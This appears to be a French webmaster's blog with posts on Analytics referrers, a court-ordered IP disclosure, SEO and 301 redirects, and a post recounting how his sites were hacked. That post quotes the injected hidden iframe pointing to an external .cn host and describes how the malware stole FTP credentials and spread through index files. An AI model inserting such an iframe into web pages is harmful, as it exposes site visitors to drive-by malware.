Mes sites

google-analytics.com dans mes sites référents

En regardant de près mes dernières stats Analytics pour mes deux principaux sites ludeales.com et litterales.com, j’ai remarqué un étrange site referrer : google-analytics.com/ga.js

Apparemment, cela ne concerne que quelques personnes (principalement des Normands, .. une conspiration? ). Y aurait-il un logiciel qui envoie exprès un mauvais referrer pour ne pas être repéré par Analytics. Cela me semble un peu étrange, mais je ne vois pas trop d’autres explications. Etrange, étrange. Quelqu’un aurait-il une idée?

Google se plie à la justice

Quand je vois des titres comme Google forcé par la justice à dévoiler l’identité d’une blogueuse, je me dis : ouah, Google s’est plié à la justice et a révélé une partie de ses logs de son moteur de recherche pour livrer un méchant blogueur. Et je parie que la plupart des personnes voyant ce titre se dise : « J’avais bien raison de me méfier de Google ». Mais, il n’en est rien. En fait, il s’agit de Google, comme entreprise et non comme moteur de recherche parce qu’il s’agit de la plateforme de blogs Blogger (aka Blogspot). Et il est tout à fait logique que si quelqu’un poste publiquement des textes illégaux (diffamatoires en l’occurrence) que l’hébergeur livre les adresses IP.

Pour la petite histoire, moi-même en tant qu’hébergeur, j’ai eu une réquisition judiciaire me demandant quelques adresses IP, je me suis obtempéré. Et je n’ai pas l’impression d’avoir mal fait. Si la justice le demande, c’est qu’ils veulent enquêter. Je ne crois pas que ce soit le rôle de l’hébergeur de bloquer la justice à ce niveau.

Comment je me suis fait hacker

Cela fait plus d’un mois que je n’ai pas écrit sur le blog. J’ai pas mal de raisons pour cela: vacances, beau temps, changement de pays, changement de boulot et … le hacking.

Petit historique:

Avertissement Chrome : site prejudiciable

- Il y a quelques mois, je clique sur une pub Adwords. Chrome m’indique que le site peut infecter mon ordinateur. Je me dis naïvement : « Oh, c’est bon, j’en vois des dizaines de sites comme ça tous les jours. Cela va être un popup qui me fait croire que j’ai un virus. Il suffit juste que je ne clique pas sur exécuter, je connais la procédure ».  Mais sans rien cliquer, je vois que plein de popup pour des faux antivirus apparaissent, mais pas des fenêtres de navigateurs; de vrais logiciels,… bref j’étais infecté. Après quelques bonnes heures à passer plusieurs antivirus (j’utilisais Nod32 à l’époque), je réussis à nettoyer l’infection. Ou en tout cas, l’infection semble relativement disparue, même si j’ai encore quelques alertes régulières quand je démarre mon PC.  Dans un coin de ma tête, je me dis qu’il faut que je réinstalle Windows un de ces jours, mais je m’arrête là.

-Fin juin (donc plusieurs mois après cette infection), ma compagne me dit que notre site a une page d’erreur sur la page d’accueil et qu’elle a réuploadé la page index.php . Aussitôt, cela me met une grosse puce à l’oreille puisque je n’ai pas uploadé le fichier index depuis plusieurs mois. Bref, si erreur il y a, intrusion il y a aussi. Après vérification, je découvre le pot aux roses. Ma page index.php avait été modifié, à la barbare. Une petite ligne avait été ajouté dans le code php :

<iframe src="http://globalmixgroup.cn :8080/ts/in.cgi?pepsi65" width=125 height=125 style="visibility: hidden"></iframe>

Evidemment,cela entrainait une erreur lors de l’affichage de la page puisque les fonctions php étaient coupées au milieu.

Après quelques tests, je me suis rendu compte que le hacker avait accès à mes comptes ftp enregistrés sur Filezilla. En attendant de pouvoir réinstaller Windows,  j’ai donc fermé tout accès ftp sur l’ensemble des sites hébergés sur mon serveur. Voici , en tout cas, ce que j’ai pu remarquer du comportement du virus:

  • Il regarde, dans tous les sous-répertoires, tous les fichiers index (.php / .html ) ainsi que les fichiers comportant le mot-clé default.
  • Dans ces fichiers, il vérifie s’il y a la balise <body> et ajoute à la suite une iframe externe pointant vers un .cn ou vers un .info. S’il ne trouve pas la balise <body>, il supprimera les derniers caractères de la page et ajoutera l’iframe même si le fichier est en php et non en html.

Bref, cela m’a fait perdre de nombreuses heures, surtout que j’ai eu des problèmes en réinstallant Windows, mais ça, c’est une autre histoire

Première visite venant de Google

Pour un blog sur le SEO, n’avoir encore reçu qu’une seule visite venant de moteur de recherche, c’est un peu un comble. Mais, comme je n’ai parlé de ce blog qu’à une poignée d’amis et collègues, je ne suis pas étonné. C’est déjà assez étrange que Google ait réussi à indexer le domaine alors que je n’avais absolument aucun lien entrant!

Qui a visité mon blog?

Quand on ne reçoit qu’une seule visite, on peut vraiment avoir beaucoup (trop) de détails rien qu’en utilisant Analytics. Donc, il a cherché sur Google liste adjectif + seo webmaster. Il (ou elle?) vient de Maubeuge, a une résolution de 1152*864 et utilise Firefox sous Windows. Il a des yeux marrons et mange des Special K tous les matins… Bon, j’en rajoute un peu, ok…

Je vais commencer au fur à mesure à me faire un peu connaître, mais j’attends déjà de ne plus être sous contrat avec mon entreprise actuelle, ce sera plus simple… Objectif : avoir une deuxième visite ;-)

Bilan sur la nouvelle version de litterales.com

Il y a un mois, j’ai totalement changé mon site litterales.com ; j’ai refait toute l’interface, et repensé entièrement la navigation. Évidemment, j’ai dû aussi changer toute la structure d’url. Je ne suis pas né de la dernière pluie, donc, j’ai mis quelques mots clés dans l’url, j’ai bien fait attention à éviter le duplicate content en ayant des critères normalisés pour l’url rewriting. Dans l’ancienne version, je mettais un peu n’importe quoi parfois, ce qui avait pour conséquence d’avoir plusieurs urls différentes pour une même page; bref, ce n’était pas génial du tout pour le passage du Page Rank.

Toutefois, malgré toutes mes précautions, je me suis un peu précipité. Oui, je voulais que le site soit prêt avant les révisions du bac. Donc, j’ai fait mes redirections 301 trop rapidement. Ainsi, j’ai redirigé la page /document_francais__ecrivain-Balzac.html vers/recherche-document–Balzac.html. Cela paraissait pratique. Dans la première version, je n’avais en effet pas mis l’identifiant de la table dans l’url (très stupide, je sais) et c’était donc assez énervant d’être obligé de rechercher l’id pour ensuite rediriger vers la bonne page; je m’étais dit naïvement : « l’utilisateur pourra trouver la page facilement ». En fait, la page de destination ayant moins de contenu intéressant, je suis assez vité arrivé dans les choux pour les mots clés sur les auteurs, « commentaire composé balzac » par exemple. Je me suis alors décidé à prendre le code à deux mains et à faire une petite page de redirection intemédiaire qui entre deux redirections 301 va tout simplement attraper l’id dont j’avais besoin et rediriger vers la bonne page.

Ainsi, /document_francais__ecrivain-Balzac.html redirige vers /rewrite–$1–auteur qui lui-même redirige vers /auteur–32-_-Balzac.html et assez vite (une dizaine de jours), j’ai retrouvé ma première position sur « explication de texte baudelaire », « dissertation voltaire » et mes visites sont remontées.

En conclusion:

  • Toujours bien gérer ses redirections 301. Même si cela prend un peu de temps, … cela vaut le coup!
  • Bien penser son url rewriting dès le début en mettant toujours dans l’url, l’id que vous voulez chercher…

Ah, et dernière chose, j’ai récupéré mes sitelinks hier :) Tout est donc rentré dans l’ordre. Ouf!